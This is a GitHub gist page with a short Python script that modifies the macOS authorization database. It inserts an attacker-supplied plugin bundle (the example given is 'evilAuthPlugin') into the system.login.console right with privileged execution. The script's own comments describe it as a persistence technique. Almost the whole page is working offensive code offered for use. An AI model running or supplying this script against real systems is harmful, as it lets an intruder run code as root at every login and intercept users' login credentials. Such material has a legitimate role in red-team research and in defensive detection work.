-
-
Save xorrior/656c2f0cdf0891926e99796625674877 to your computer and use it in GitHub Desktop.
python script to install authorization plugin that requests system.login.console right
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# install authorization plugin for persistence. | |
# orginal script here: https://github.com/chilcote/pylab/blob/070c328bc4929e7e7042f6bd1e42d2700abb05e4/auth_db.py | |
# system.login.console right should be used for auth plugins | |
# ex: installplugin.py evilAuthPlugin | |
import sys | |
import objc | |
from ctypes import CDLL, c_void_p, byref, c_char_p | |
from ctypes.util import find_library | |
from PyObjCTools import Conversion | |
Security = CDLL(find_library("Security.framework")) | |
AuthorizationRightSet = Security.AuthorizationRightSet | |
AuthorizationRightGet = Security.AuthorizationRightGet | |
AuthorizationCreate = Security.AuthorizationCreate | |
def authorization_right_get(right): | |
db_buffer = c_void_p() | |
AuthorizationRightGet(right, byref(db_buffer)) | |
if db_buffer: | |
return objc.objc_object(c_void_p=db_buffer).mutableCopy() | |
return None | |
def authorization_right_set(right, value): | |
auth_ref = c_void_p() | |
AuthorizationCreate(None, None, 0, byref(auth_ref)) | |
return AuthorizationRightSet(auth_ref, right, value.__c_void_p__(), None, None, None) | |
if __name__ == '__main__': | |
if len(sys.argv) < 2: | |
print "Please provide the bundle name, without the extension" | |
sys.exit(0) | |
bundle = sys.argv[1] | |
authright = "system.login.console" | |
db = authorization_right_get(authright) | |
i = db["mechanisms"].index("HomeDirMechanism:status") #Get the position of the last HomeDirMechanism | |
mechanismValue = u"{}:login,privileged".format(bundle) | |
# Convert the pyobjc object to a python object, something we can change | |
writeableDB = Conversion.pythonCollectionFromPropertyList(db, conversionHelper=None) | |
writeableDB['mechanisms'].insert(i+1, mechanismValue) | |
db = Conversion.propertyListFromPythonCollection(writeableDB, conversionHelper=None) | |
# Update the authorization database | |
authorization_right_set(authright, db) | |
print "Done" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment